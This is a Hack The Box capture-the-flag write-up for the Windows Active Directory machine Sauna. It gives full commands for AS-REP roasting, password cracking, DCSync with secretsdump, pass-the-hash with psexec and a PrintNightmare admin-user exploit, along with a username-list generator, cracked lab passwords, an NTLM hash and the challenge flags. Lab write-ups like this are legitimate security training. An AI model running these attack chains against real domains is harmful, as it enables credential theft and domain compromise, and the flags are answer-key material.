Platform: Hack The Box
IP Address: 10.129.95.180
Difficulty: Easy
Category: Windows / Active Directory
Sauna is an Easy-rated Windows Active Directory machine. It starts with enumerating employee names from the company website to build a username list, which leads into AS-REP roasting of an account with Kerberos pre-authentication disabled. Once initial access is gained over WinRM with the cracked password, privilege escalation comes from autologon credentials stored in the registry for a service account, and BloodHound shows that this account holds the replication rights needed for DCSync. The box can also be rooted via PrintNightmare.
Attack path:
- fsmith via GetNPUsers.py yields a crackable AS-REP hash.
- winPEAS reveals stored autologon creds for svc_loanmgr.
- svc_loanmgr has DS-Replication-Get-Changes-All (alongside DS-Replication-Get-Changes, which DCSync also requires) on the domain object, enabling DCSync.
- With secretsdump.py we dump the Administrator hash.
- psexec.py with the dumped hash (pass-the-hash) gives a SYSTEM shell.

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt
john --wordlist=rockyou.txt hashes.txt
evil-winrm -i $target -u fsmith -p Thestrokes23
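The users.txt fed to GetNPUsers.py above has to be built from the names on the company website. The following is an added example, not part of the original writeup, showing how that list is generated: it strips honorifics and middle initials and emits the usual sAMAccountName conventions, most common first. The sample names are constructed (the writeup only names fsmith; the other two are placeholders).

```python
import re
from typing import Iterable, List, Optional, Tuple

# Constructed sample input: names as they might be scraped from the company's
# team page. The writeup only names fsmith; the other two are placeholders.
SCRAPED_NAMES = [
    "Fergus Smith",
    "Jane Doe",
    "Dr. John A. Public",   # honorific and middle initial must not leak into the username
]

HONORIFICS = {"dr", "mr", "mrs", "ms", "miss", "prof", "sir"}


def normalize_name(full_name: str) -> Optional[Tuple[str, str]]:
    """Reduce a display name to (first, last), lowercase ASCII letters only.

    Honorifics and middle names/initials are dropped; a name with fewer than two
    usable parts yields None because no first/last convention applies to it.
    """
    parts = []
    for token in full_name.split():
        token = re.sub(r"[^a-z]", "", token.lower())
        if token and token not in HONORIFICS:
            parts.append(token)
    if len(parts) < 2:
        return None
    return parts[0], parts[-1]


def candidate_usernames(full_name: str) -> List[str]:
    """Return common AD sAMAccountName conventions for one person, most common first."""
    norm = normalize_name(full_name)
    if norm is None:
        return []
    first, last = norm
    patterns = [
        first[0] + last,          # fsmith  (the convention this domain uses)
        first + "." + last,       # fergus.smith
        first + last,             # fergussmith
        first + "_" + last,       # fergus_smith
        first[0] + "." + last,    # f.smith
        first + last[0],          # ferguss
        last + first[0],          # smithf
        last + "." + first,       # smith.fergus
        last + first,             # smithfergus
        first,                    # fergus
        last,                     # smith
    ]
    # A one-letter first name makes some patterns collide; keep the first occurrence.
    seen = set()
    return [p for p in patterns if not (p in seen or seen.add(p))]


def build_userlist(names: Iterable[str]) -> List[str]:
    """Merge candidates for every name, de-duplicated, preserving order."""
    seen = set()
    out = []
    for name in names:
        for user in candidate_usernames(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Writes the users.txt consumed by: GetNPUsers.py <DOMAIN>/ -usersfile users.txt
    with open("users.txt", "w") as fh:
        fh.write("\n".join(build_userlist(SCRAPED_NAMES)) + "\n")
```

Feeding the whole list to GetNPUsers.py is safe against lockout: an AS-REQ for a nonexistent principal is answered with KDC_ERR_C_PRINCIPAL_UNKNOWN and does not count as a failed logon, and the error itself tells you which candidates are real accounts even when they have pre-authentication enabled.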
# Grab autologon creds with winPEAS (they live in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon as DefaultUserName / DefaultPassword, readable by any local user)
# Login as svc_loanmgr
# Dump domain hashes with secretsdump
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$target
psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@$target -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
# Alternative root: use PrintNightmare (CVE-2021-1675 / CVE-2021-34527) to create a new admin user; requires the Print Spooler service to be running on the DC
# Run Invoke-Nightmare from the fsmith Evil-WinRM session; with no arguments the PoC creates the local administrator adm1n / P@ssw0rd
Invoke-Nightmare
evil-winrm -i $target -u adm1n -p 'P@ssw0rd'
user.txt: d877e054079380297969152d0bfa7750
root.txt: 291b6896f3974bbef8b42b7805735bcc